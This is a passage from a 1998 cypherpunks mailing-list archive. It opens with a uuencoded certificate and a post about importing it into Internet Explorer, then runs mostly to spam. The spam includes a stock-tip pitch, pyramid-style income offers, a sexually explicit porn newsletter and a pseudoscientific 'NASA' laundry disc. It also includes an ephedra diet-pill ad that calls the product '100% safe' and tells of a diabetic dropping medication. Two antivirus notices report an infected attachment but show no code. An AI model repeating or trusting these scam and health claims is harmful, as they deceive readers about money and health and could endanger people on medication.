MKVS30]/WZ#[J>J/M93F"Z%W'FG2_.1ME6QIO,Y1`!+?M0N,FM!27.%%/G_:3
M<U2G!8=T6GL0^3LOMUT=6;EDCU*4M_B#4/UUA7UQ\_*<6.^Q,Q\\U(NB//#B
MVDZX+>-LZ^)G@G69#(AGUR''7E$W/Y6A;(`N==^CKFP`K#M03T!NY@<H:#><
M$9>'M5YJ"A'*,#G:KF;/%("QPK7R)*Y0EO9,%*F'*\8H`BL&P\'B-'EW@RR&
MM:S07"6\/&%>AT[FX<!-)F*U^U`_1F!C`CU?%B25),7YW7!J9\(UL1).#KQ5
MYD>_#<#*^DEE?[?:;&'W;[X9]?)4U]_;&:<%%0Y''2BOU/:E4Y$J"8Z6ZU&!
MU\<EEU;3C:JQG'0$A%DK#_$>B\$$R90-@<7WZ+2ILRSYFYSM\&"8E(&P%F"J
MB9]]6/"['02-$;)'J2TWE!&P;:+8S';SFFCU`K!QFH`;<)-^Z9)L*!H[(\++
MIN?K$W*\./L#K?*A&B2IJ,8]_C>`K,4R)DQ1N>WCL"E^J.40C]HW%N")D(<V
MXX/<!UK2>6XOX#<G&;<>CQX,[C&V@0.1`<TYM%5`R(E@F,HINPOG@HD$`00$
M`0@$"`,O]&!S\*,`!`$$!`$(!`@C?KA8R:[.300!!`0!2`1(PCRQCG!5A*LH
MWZKJF_"\?3?'NQI^`';&7!/GR;_SBAGZ,/3HJ'5XEY:.Z#FB%PN,7::GW`X;
MK5=QI<0F=+&N39[&;PXK9RQ.!`$$!`$0!!")WRW,UF6I5@2//%/;-1Y1!`$$
M!`$8!!AAK%?A4_O$R$](>E[87<K=XJO1(:L;.&@$`00$`0@$"`C05EF1F=@0
M!`(```0"```$`@``!`(```0"```$`@``````````,#4P(3`)!@4K#@,"&@4`
J!!3AW(SLH6UW.V4^I.],(DR_+[D-N000G)PQBC:?#9;D_!U4*SHN@@``
`
end


To import the certificate in your Microsoft[tm] Internet Explorer 4 browser,
I try:

 Click on View -> Internet options -> Content tab
 Click the "personal" button under Certificates
 A new window opens. Click on Import
 Type in the name of your local file and the password (cypherpunks).

IE simply says it can't import it, with no details!

I *assume* it's because "Vesign web site CA" isn't even listed among the
authorities IE accepts (and I'm too lasy to search the web for whatever
I need to add to IE)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: invest@juno.com
Date: Thu, 29 Jan 1998 21:08:50 -0800 (PST)
To: invest@yes.com
Subject: The # 1 Stock Recommendation Service Is Free
Message-ID: <199702170025.GAA08056@yes.com>
MIME-Version: 1.0
Content-Type: text/plain




We are very excited to inform you about the most accurate and reliable e-mail stock recommendation service on the net today. What's even better is that it is free. Damex research specializes in the following areas:

1.) Finding undiscovered and undervalued stocks that have tremendous potential for dramatic appreciation.

2.) Uncover low priced stocks on the verge of breakouts from stagnant positions. Usually the company chosen will have recently undertaken a change in management, obtained a research breakthrough, made an important acquisition, developed a remarkable new product or obtained important financing. Any of these factors could lead to rapid price appreciation

3.) Identifies over priced companies ripe for selling short. Includes price to go short with stop loss for all short positions.

All recommendations are easy to implement and are low stress and high profit stock and option trades

We have to earn your trust. Our staff understands that most people don't have the time and resources to do the in depth research and analysis necessary for successful investing.That's why thousands of investors prefer Damex Research to do it for them.

To Subcribe Send your e-mail address to     damex3@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: seo85@prodigy.com
Date: Thu, 29 Jan 1998 11:44:24 -0800 (PST)
To: seo85@prodigy.com
Subject: BUISNESS IS BOOMING
Message-ID: <199801294013VAA41033@post.com.tw>
MIME-Version: 1.0
Content-Type: text/plain


WE ARE VERY EXCITED TO ANNOUNCE,



National Software Company is currently seeking independent
agents for marketing their services.  If you're reading this,
you have what it takes, (a computer and modem,) to start
your own business, work part-time or full-time.  The commissions
are great, the products are great, and it sells itself.   You will
be sent all the materials it takes to take orders in the convenience
of your own home,-manual, order forms, software, etc.
No cold calling  No face to face. 
This is a real company, desiring real people who want
in on the ground floor.  With all the people getting online via
AOL, Compuserve, Netscape, the marketing and need is great.You must be
a self-starter , and make between $700-to-$1000 per week to start. 
Our average agents yearly salary is six figures.  
Be your own boss!  Join us and become an independent sales agent .  
Call for exciting message!
312-409-7743
















=cyperse





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MTL_HUB@mbi.mercantile.com
Date: Fri, 30 Jan 1998 06:02:00 -0800 (PST)
To: GroupShield.Notification.List@mbi.mercantile.com
Subject: ALERT: Message from kes21 was truncated; File att1.com infected with BW.556 virus
Message-ID: <8625659C.004D8672.00@mbi.mercantile.com>
MIME-Version: 1.0
Content-Type: text/plain



Please refer to the GroupShield Quarantine Area for more details.
 INCIDENT
---------------------------------------------------------------------------
---------------------------------------------
 Scan Time:    01/30/98 08:06:45 AM
 Detection:    File att1.com infected with BW.556 virus
 Disposition:  Note has been truncated
 Quarantined:  (Document link not converted)
CN=MTL_HUB/OU=STL/O=MTL!!d:\notes\data\QAREA.NSF
 Version:      GroupShield 3.14 (Build 184)

 MESSAGE
---------------------------------------------------------------------------
---------------------------------------------
 Message ID:   004D7F4F
 Sender:       kes21@chat.ru
 Subject:      Re: Programming
 Recipients:   CN=Taru Goel/OU=STL/O=MTL
 Routing:      CN=MTL_HUB/OU=STL/O=MTL

 SYNOPSIS
---------------------------------------------------------------------------
---------------------------------------------
RICH TEXT 'Body' (NORMAL)
RICH TEXT 'Body' (NORMAL)

FILE ATTACHMENT 'att1.com'
     << BW.556 >>
     File size:     559 bytes
     Host type:     MSDOS
     Compression:   OFF
     Attributes:    PUBLIC READ-WRITE
     File flags:    0
     Created:       01/30/98 08:06:29 AM
     Modified:      01/30/98 08:06:29 AM
     Status:        Removed
     Scanner:       McAfee Scan DLL (version 3030) found BW.556







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 30 Jan 1998 00:41:08 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 30 '98
Message-ID: <19980130081656.9486.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

BLACK LABEL
Get yourself  a FREE two day pass to Black Label!  They have
over 2,000  hardcore movies,  FREE live  fucking -  over 200
with sound,  10,000 hot  sex stories,  Top-quality  hardcore
pictorials, and so much more you'll be amazed. Check it out!
Black Label ---------> http://www.xxx69.com/banner_mail.html 

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
SINFUL'S 20 FREE XXX PICS
http://www.sinful.net/cgi-bin/topvlog.cgi?eureka
20 FREE HARDCORE, CUMSHOT, GROUPSEX, AND FREE ANALSEX PHOTOS
UPDATED WEEKLY PLUS LINKS TO 700+ FREE ADULT PICTURE SITES.
CATEGORIES INCLUDE: ASIAN, HARDCORE, SOFTCORE, BABES, AND
PIC LINKS. YOU GET ALL OF THIS FOR FREE!! VISIT US NOW!!

SWEBABES
Meet Mistress Desire  -  see  her  naked!  Theres  plenty of
steamy pix to get you  hot.  Plus, let your imagination take
flight... there's nothing like a good bedtime story. 'Seeing
two huge sets of tits pressed together. I decided to join in
the action. Carla quickly moved her head between my legs' !!
Swebabes .......................... http://www.swebabes.com/

DONNA'S TIGHT BEAVERS
Imagine yourself getting it  on  with  Donna's full breasted
peachy assed glorious girls.  Mmmm.  Click on the thumbnails
to peer a little  closer  at  these  paragons of wild wanton
womanhood. Easy to use.  Easy on the eye. Hard on the pants.
Tight Beavers ..... http://www.megaservices.com/adult/donna/

DUTCH 4 ALL
It's a free for all hardcore  pix  lucky dip. Get up to your
elbows in masturbation, eighteen,  asian,  or  live shows to
name but some.  It's  easy  to  get  to  the  porn  which is
regularly updated, including special  features.  In an ocean
of storm tossed  porn it's a lighthouse,  a hardcore harbor!
Dutch 4 All ...................... http://www.dutch4all.com/

LICK IT
This is a top site for  lovers of oral action. With lashings
of steaming oral hardcore  pix.  Some  girls just can't help
playing  with  their  food.   Some   guys   just  cant  help
feeding'em! It's a three  course  meal  of  a site. Lick it.
Lick It ........ http://www.cybertoad.com/lickit/warning.htm

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Pregnant ----------------------> http://207.168.184.26/preg/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
KAREN: A twenty year old  bi-babe  who loves pussy more than
dick, this chick is one  hot  commodity. Her girlfriend is a
topless dancer. A sexy  blonde  with  real tits, and bedroom
eyes, Karen is a keeper!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
StinkyBoy's Sex Stories: Stinky gives  you a fresh selection
of sex stories in 3  nasty categories: Gang Bangs, Lesbians,
and B & D. ............... http://www.stinkyboy.com/stories/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?300
Pic  2 --------------------------> http://137.39.63.229/?301
Pic  3 --------------------------> http://137.39.63.229/?302
Pic  4 --------------------------> http://137.39.63.229/?303
Pic  5 --------------------------> http://137.39.63.229/?304
Pic  6 --------------------------> http://137.39.63.229/?305
Pic  7 --------------------------> http://137.39.63.229/?306
Pic  8 --------------------------> http://137.39.63.229/?307
Pic  9 --------------------------> http://137.39.63.229/?308
Pic 10 --------------------------> http://137.39.63.229/?309

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MTL_HUB@mbi.mercantile.com
Date: Fri, 30 Jan 1998 06:38:50 -0800 (PST)
To: GroupShield.Notification.List@mbi.mercantile.com
Subject: ALERT: Message from kes21 was truncated; File att1.com infected with BW.556 virus
Message-ID: <8625659C.0050FC3C.00@mbi.mercantile.com>
MIME-Version: 1.0
Content-Type: text/plain



Please refer to the GroupShield Quarantine Area for more details.
 INCIDENT
---------------------------------------------------------------------------
---------------------------------------------
 Scan Time:    01/30/98 08:44:33 AM
 Detection:    File att1.com infected with BW.556 virus
 Disposition:  Note has been truncated
 Quarantined:  (Document link not converted)
CN=MTL_HUB/OU=STL/O=MTL!!d:\notes\data\QAREA.NSF
 Version:      GroupShield 3.14 (Build 184)

 MESSAGE
---------------------------------------------------------------------------
---------------------------------------------
 Message ID:   0050F98C
 Sender:       kes21@chat.ru
 Subject:      Re: Programming
 Recipients:   CN=Taru Goel/OU=STL/O=MTL
 Routing:      CN=MTL_HUB/OU=STL/O=MTL

 SYNOPSIS
---------------------------------------------------------------------------
---------------------------------------------
RICH TEXT 'Body' (NORMAL)
RICH TEXT 'Body' (NORMAL)

FILE ATTACHMENT 'att1.com'
     << BW.556 >>
     File size:     559 bytes
     Host type:     MSDOS
     Compression:   OFF
     Attributes:    PUBLIC READ-WRITE
     File flags:    0
     Created:       01/30/98 08:44:28 AM
     Modified:      01/30/98 08:44:28 AM
     Status:        Removed
     Scanner:       McAfee Scan DLL (version 3030) found BW.556







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Freakazoid - The Evning Hacker" <donotreply@00759.com>
Date: Fri, 30 Jan 1998 09:22:55 -0800 (PST)
To: Friend@public.com
Subject: FUA - GRAND OPENING
Message-ID: <199801301722.JAA02423@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Undergrounders, Hackers, Crackers or what ever you are!

I have now disigded the opening date for Freakazoid`s Underground ARchive
It will open 1998-02-03 - The 2nd of Mars. It will contain material that is high 
rated on the goverments hate list`s. So why dont come visit os and check it 
out. Now you can read about the development on the site. So come visit us.

http://freakazoid.simplenet.com

-- -- -- -- END OF FREAKAZOID TRANSMITION -- -- -- --




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fuahuolee91@prodigy.com
Date: Fri, 30 Jan 1998 19:01:05 -0800 (PST)
To: fuahuolee91@prodigy.com
Subject: Washing your clothes is hazardous to the Earth!
Message-ID: <199801302096OAA2432@post.heriot-watt.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT  COLOR="#00ffff" SIZE=3>                     </FONT><FONT  COLOR="#ff0000" SIZE=4>EXCLUSIVE RIGHTS TO NASA TECHNOLOGY!</FONT><FONT  COLOR="#00ffff" SIZE=3>
</P><P ALIGN=JUSTIFY>
That's right, we have exclusive worldwide rights to this NASA-developed technology for use in our laundry system.  MAKE $2,000 TO $8,000 per month!.  North Carolina State University, College of Textiles, laboratory tests confirm our Ultra 7 laundry system outperforms Liquid Tide, Wisk and All detergents and states The LaundryMaster Disk was also the most effective of the four cleaning systems in improving the whiteness of the poly/cotton fabric.  We have the tests results that prove it.
</P><P ALIGN=JUSTIFY>+ Five of the most respected environmental groups in the country support our product  Including the Clean Water Project. (Call us and we will tell you who they are). This is a legitimate business with an entirely unique product called the Ultra 7 Laundry System.  Our company employs over 120 people, has over 50,000 reps worldwide and has done over $50 million in sales of this one product in just 9 months.  We help sponsor The Clean Water Project and are endorsed by 5 Major Worldwide Environmental groups.  . We are for real!!

Hello, Are you concerned about the damage we are doing to our environment?  I am, and so is the company I am affiliated with.  That's why they purchased the rights to this incredible technology never before used in the home laundry industry.  With our laundry system, you can throw away your detergent, bleach, stain removers and fabric softeners!  That's right, CHEMICAL FREE WASHING with our exclusive laundry system.  Here's what I mean:
</P><P ALIGN=LEFT>+ EASY TO USE-simply drop the disc into your machine with your dirty clothes, add our breakthrough bionic enzymes to replace bleach and stain removers
+ SAVES YOU $$-our disc is guaranteed to last for 7 YEARS.  An average of only 2 cents per wash load!
+ CHEMICAL-FREE WASHING-works on the principles of liquid magnets developed by NASA 30 years ago for the space industry
+ INCREASES LIFE OF YOUR CLOTHES-no damaging additives that lead to the breakdown of your clothing, or harm the environment. 60% less lint.
+ 100% HYPOALLERGENIC AND ENVIRONMENTALLY FRIENDLY-no residue is left in your clothes, especially important to people with allergies or sensitive skin.

If you want to know more about this incredible new product, and about the fantastic business opportunity available right now (our distributors are breaking all the income records for this industry in just our first eight months in business), then please call 1-888-365-0000  ext.2464 and leave your name, state,  and both work and home phone numbers.  I  will  be  glad  to  rush  you a free comprehensive information package, as well as your very own laundry system for demonstration.. You'll be able to see for yourself that it truly works great.  Help clean up the environment and make big money too, what could be better?!  Please, serious inquiries only. I apologize for any inconvenience and hope to hear from you soon. Thank you for your time.  


Best Regards,

L.C. Green 


PS: Call 1-888-365-0000 ext.2464 now to receive your free comprehensive information package and demonstration laundry system.  


TO BE  REMOVED TYPE REMOVE IN SUBJECT AND REPLY TO sowell@bizzy.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mb-347@lyte.net
Date: Fri, 30 Jan 1998 18:15:04 -0800 (PST)
Subject: Multiply Your Traffic In 5 Minutes!
Message-ID: <199801310159.UAA04701@mail.aolter.net>
MIME-Version: 1.0
Content-Type: text/plain


Tired of top lists?

Here's an innovative new way for adult 
webmasters to MULTIPLY their traffic!

http://www.gatkin.com/easyhits.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: action@psp.ink
Date: Fri, 30 Jan 1998 20:45:28 -0800 (PST)
To: Friend@public.com
Subject: Success Magazine - over 100 yrs.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


New! From ATA Publications:

Now you can get in on the ground floor selling Success Magazine and Entrepreneur Magazine, two well known and well respected business publications.

Now you can earn over $100,000 this year selling products that everybody wants. It will be so simple!

Incredibly low investment, under $45!!! GET IN NOW!!!

4x7 Progressive Matrix pays over $100,000.

NEW  Jan.20,1998!!!!

For more info call: 800-338-1349





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@aol.com
Date: Fri, 30 Jan 1998 22:29:56 -0800 (PST)
To: mike@aol.com
Subject: HERBAL ENERGIZER......SUPER FAT BURNER!!!!
Message-ID: <199801304432EAA48264@post.eznet.it>
MIME-Version: 1.0
Content-Type: text/plain




</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=4><B><I>INCREASE YOUR ENERGY LEVEL & <U>FIRM UP</U> - 
<U>WITHOUT GIVING UP</U> THE FOOD YOU LOVE!</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
<FONT  COLOR="#000000" SIZE=2> All Natural Energizer   Reduce Sugar Cravings   Burn the Fat While You Keep the Muscle
 Eat the Foods You Love   Preferred by Fitness Experts   100% Safe and Natural
<FONT  COLOR="#000000" SIZE=3>
<FONT  COLOR="#0080ff" SIZE=3><B><I>AN INCREDIBLE NUTRITIONAL BREAKTHROUGH!</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     I know what you're thinking. I felt the same way at first....but I found that there <B><I>is</B></I> finally a way to trim down and shed unwanted fat without all the hassles of a diet and strenuous exercise. Yes, there's actually a way to firm up without giving up the food you love. And it's so easy! I just take one <B>Thermo-Lift(tm)</B> capsule twice a day...and that's it! Sure, exercise and daily activity will contribute to your results, but they're not required! And just think...no messy powders or mixes. No starvation. No rationing your food by the ounce. <B>Thermo-Lift(tm)</B> improves your metabolism <B>so your body burns the excess fat!  </B>I actually noticed my clothes fitting better before I noticed the pounds coming off! 
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>METABOLISM IS THE KEY</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     Anyone who has struggled to lose weight can tell you diets alone don't work! That's because your size, or your weight, has more to do with your metabolism than what you eat.
     <I>Changes International</I> has designed a product that works several ways to help you achieve maximum results from your weight-loss program. This unique blend of herbs, botanicals and Chromium Picolinate improves your metabolism so your body relies more on stored body fat and less on stored proteins. 
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>STOP THE YO-YO CYCLE!</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     On a typical diet, up to 30% of lost weight is muscle. Losing muscle lowers your metabolic rate and slows the burning of calories. This lower metabolic rate also makes it hard to keep lost pounds from creeping back. Result: the Yo-Yo syndrome! You know, up and down...up and down. <B>After each lose-gain cycle the proportion of fat actually increases!</B>
     To break this vicious cycle, it is important to lose only fat while maintaining... or even increasing... muscle! Our unique formula is a specialized combination of herbs and botanicals coupled with the best source of chromium available. Patented Chromium Picolinate, a bio-active chromium with clinically proven benefits, is vital to good health and is essential for the effective functioning of insulin.
     <B>Studies have shown chromium nutrition to be an effective part of LONG-TERM fat loss programs!
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><I>NATIONALLY RECOGNIZED </FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT> Three million readers of <I>Cosmopolitan</I> read a discussion of Chromium Picolinate's value for dieters under the headline, "A Miracle Mineral?".
 The cholesterol-reducing effect of Chromium Picolinate was highlighted in <I>Ladies Home Journal</I>.
 <I>Longevity</I> magazine has praised it as a safe alternative to anabolic steroids. 
 A large number of publications for athletes and health food shoppers have also run feature articles on Chromium Picolinate, including: <I>Prevention, Today's Living, Total Health </I>and <I>Muscular Development</I>.
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>HERE'S MORE EVIDENCE!</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     Several double-blind crossover studies conducted along with clinical and laboratory tests at a leading university and hospital have proven that the ingredients in <B>Thermo-Lift(tm)</B> are effective. Without changing dietary or exercise habits over a 6-week period, subjects in separate studies lost an average of 23% body fat or approximately 4.4 pounds of fat, and increased lean body mass by 1.5 pounds.
     <FONT  COLOR="#ff0080" SIZE=3>People over the age of 46 did even better, and women seemed to do the best! People with elevated cholesterol levels averaged a 10% drop in LDL cholesterol. </FONT><FONT  COLOR="#000000" SIZE=3>
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>WHAT'S IN THERMO-LIFT(tm)?</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     Chromium Picolinate, Bee Pollen, Astralagus, Licorice Root, Ginger Root, Rehmannia Root, Siberian Ginseng, Ma Huang Extract, Gotu Kola, Bladderwrack, White Willow Bark, Guarana Extract and Reishi Mushroom. All ingredients are formulated and synergistically blended to be both 100% safe and effective. <B>Thermo-Lift(tm)</B> is manufactured and bottled by a 25 year-old, pharmaceutical company and all FDA standards have been met or exceeded.
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>THE ENERGIZERS</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     Siberian Ginseng: Good source of energy and endurance. Increases physical and mental vigor. Ma Huang extract: Helps to increase energy, improve circulation, control appetite and decongest. The Chinese use it for treatment of asthma and other respiratory disorders. Guarana extract: Increases mental alertness and fights fatigue-a very high energy source. Rehmannia Root: Used to treat anemia, fatigue, and to promote the healing of bones. Astralagus: Acts as a tonic to protect the immune system and increases metabolism. Bee Pollen: Effective for combating fatigue, depression, and colon disorders.
</P><P ALIGN=CENTER><FONT  COLOR="#0080ff" SIZE=3><B><I>WHAT OTHERS HAVE FOUND...</FONT><FONT  COLOR="#000000" SIZE=3></B></I>
</P><P ALIGN=LEFT>     "My name is Denita Kellet. In just 18 months, I have been able to lose 212 pounds and over 52 inches over my entire body! I have a non-functioning thyroid and for years have fought a losing battle with a bad weight problem. Then I found <B>Thermo-Lift</B>...
     This product has greatly enriched my life and my health. I wish everybody could feel as good as I feel. I'm a lot more active and able to play with my family. All I can say is, thanks 110% <B>Thermo-Lift</B> for what you've done for me and my life." 
    <FONT  COLOR="#0080ff" SIZE=3><I> -Denita went from 340 pounds to 128 pounds in 18 months. Before and after pictures available!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     "My name is Misty McDonald. I'm a twenty-two year old working mother of two children. In just five months I have lost an amazing seventy pounds. I dropped an incredible sixteen dress sizes! At 180 pounds, I was very unhappy and depressed. I felt very insecure about myself and really didn't like to go outside the house. Then I found <B>Thermo-Lift</B> and what a difference it has made in my life! Thank you <B>Thermo-Lift</B> for changing my life and making me feel complete."
     <FONT  COLOR="#0080ff" SIZE=3><I>-Misty went from 180 pounds to 110 pounds in only 5 months. Before and after</I> <I>pictures available!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     "I have been examined by my doctor and my weight loss has blown his mind! People that I used to work with, and even some family members, have trouble recognizing me. I wish everyone that is overweight could be sent my way so that I could talk to them. Maybe I could be of help, since I've lost 150 pounds so far."
    <FONT  COLOR="#0080ff" SIZE=3> <I>-Kenny went from 350 pounds to 200 pounds. Before and after pictures available!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     "I started taking <B>Thermo-Lift</B> March 1st of this year. My sister just kept after me. I felt happy eating, and did not want to change my life, so I didn't. I just took <B>Thermo-Lift</B> and kept eating. I noticed my clothes getting looser on me, but I haven't kept a scale in my house for over ten years. The middle of May, I found a commercial scale and weighed myself. I had lost 50 pounds, in just 2 1/2 months! I celebrated by buying myself a new pair of jeans. I went from a size 48 waist to a size 42!
     The best part is I am a non insulin-dependent diabetic and was taking 10 mg of diabeta every day to control my blood sugar. I monitor my blood sugar myself, and with <B>Thermo-Lift</B> my sugar level went below 70 for the first time in years. My doctor has now taken me off my medication, and <B>Thermo-Lift</B> is keeping up very good. I still watch it closely, but I hate to be chemically dependent like that. I thank my sister every week for turning me on to <B>Thermo-Lift</B>."
     <FONT  COLOR="#0080ff" SIZE=3><I>-Bernie has lost 60 pounds so far... and is still going!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     "Over the last 10 years, I have tried a variety of weight loss methods, spent thousands of dollars and failed at all of them. By December 1995, I was the heaviest I had ever weighed-235 pounds. I had no energy. My self-esteem had hit rock bottom... I was introduced to <I>Changes International</I> and <B>Thermo-Lift</B> and have never looked back! My energy level has boosted and my weight loss increased... In total I have lost 70 pounds and went from a size 22 to a size 12. The  amazing part - it's so easy!
     <FONT  COLOR="#0080ff" SIZE=3><I>-Becky went from 235 pounds to 165 pounds. Before and after pictures available!</FONT><FONT  COLOR="#000000" SIZE=3></I>
</P><P ALIGN=CENTER>**************************************************<FONT  COLOR="#c91e00" SIZE=3>
</FONT><FONT  COLOR="#000000" SIZE=3>
<FONT  COLOR="#c91e00" SIZE=6><U>NOW IT'S YOUR TURN!<FONT  COLOR="#c91e00" SIZE=3></U>

</FONT><FONT  COLOR="#ff0000" SIZE=3><B>Experience the incredible changes Thermo-Lift can make in YOUR life. 

Over 90% of our customers report feeling a change within 2 to 3 days!  
Even if it took YOU 2 to 3 weeks, wouldn't it be worth it?

With your order, you will receive a one month supply of 60 capsules. 
No diet is included because none is needed! 
Your small investment of only $29.95 plus $3.00 S&H will start you on the 
path to a NEW YOU... for about a dollar a day. 

Your satisfaction is 100% guaranteed or your purchase price (less S&H) will be 
cheerfully refunded upon return of the unused portion.</FONT><FONT  COLOR="#000000" SIZE=3>
</P><P ALIGN=LEFT></B>
     <FONT  COLOR="#0080ff" SIZE=3><B>TAKE ACTION RIGHT NOW!</FONT><FONT  COLOR="#0000ff" SIZE=3></B> </FONT><FONT  COLOR="#000000" SIZE=3>Only by starting <B>Thermo-Lift(tm)</B> immediately can you begin to feel the boost in energy and the increased fat burning efficiency of your new metabolic rate. Be prepared to experience a bit of a "spring" in your step when you use <B>Thermo-Lift(tm)</B> and remember... if you find it CURBING YOUR APPETITE, don't blame me. You were warned!

</P><P ALIGN=CENTER>*****************************************************
<FONT  COLOR="#0080ff" SIZE=3><B>TO ORDER THERMO-LIFT(tm):</FONT><FONT  COLOR="#000000" SIZE=3></B>
Complete the form below and mail it with your check or money order payable to:

Merriman Mktg.
Dept. M127
PO Box 121
Garfield, NM 87936
</P><P ALIGN=LEFT>
Questions about the product or about the status of your order?  Call our message center at 505-267-1405 and leave your name, phone number (including area code), and the best time to reach you.

<FONT  COLOR="#0080ff" SIZE=3>Also available</FONT><FONT  COLOR="#000000" SIZE=3> -- an alternative supplement for those who desire weight loss without the energizing effects of <B>Thermo-Lift(tm)-<FONT  COLOR="#ff8040" SIZE=4>Changes NOW!(tm)</FONT><FONT  COLOR="#000000" SIZE=3></B>. A revolutionary combination of fibers, enzymes, vitamins and minerals designed to <FONT  COLOR="#0080ff" SIZE=3>attract and hold fats</FONT><FONT  COLOR="#000000" SIZE=3> and <FONT  COLOR="#0080ff" SIZE=3>remove them from the digestive tract</FONT><FONT  COLOR="#000000" SIZE=3>.

</P><P ALIGN=CENTER>------------------------------------------------ CUT  HERE------------------------------------------------
</P><P ALIGN=LEFT>                    
YES! I want ____ bottles of THERMO-LIFT(tm) at $29.95 each:     $________

YES! I want ____ bottles of Changes NOW!(tm) at $29.95 each:    $________

5% Shipping & Handling: ($3.00 minimum)                                $________

                Total Amount Enclosed (Payable to Merriman Mktg.):  $________

Dept. M127

Your Name: ______________________________________________________  
                          
Address: ________________________________________________________
                          
City, State, Zip: ___________________________________________________
                          
Phone (Day): ________________________ (Eve): _______________________

</P><P ALIGN=CENTER>THANK YOU for your order!  Drop us a line and let us know how <U>you</U> like it.

************************************************
</P><P ALIGN=LEFT><FONT  COLOR="#000000" SIZE=2>The information contained in this e-mail was derived from many medical, nutritional, and media publications. It is not intended for medical or nutritional claims but for informational and educational purposes. Please consult a health professional should the need for one be indicated.<FONT  COLOR="#000000" SIZE=3>

<FONT  COLOR="#3d6ee5" SIZE=2>Check here</FONT><FONT  COLOR="#000000" SIZE=2> ____<FONT  COLOR="#3d6ee5" SIZE=2> to receive a free copy of the "...Big Clues" audio tape</FONT><FONT  COLOR="#000000" SIZE=2>. This
informational tape, narrated by Mr. Michael Clutton, shatters some of the common myths and misconceptions about wealth and business in America. A rare blend of common sense and humor that will raise your eyebrows!<FONT  COLOR="#000000" SIZE=3>




</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 31 Jan 1998 02:38:37 -0800 (PST)
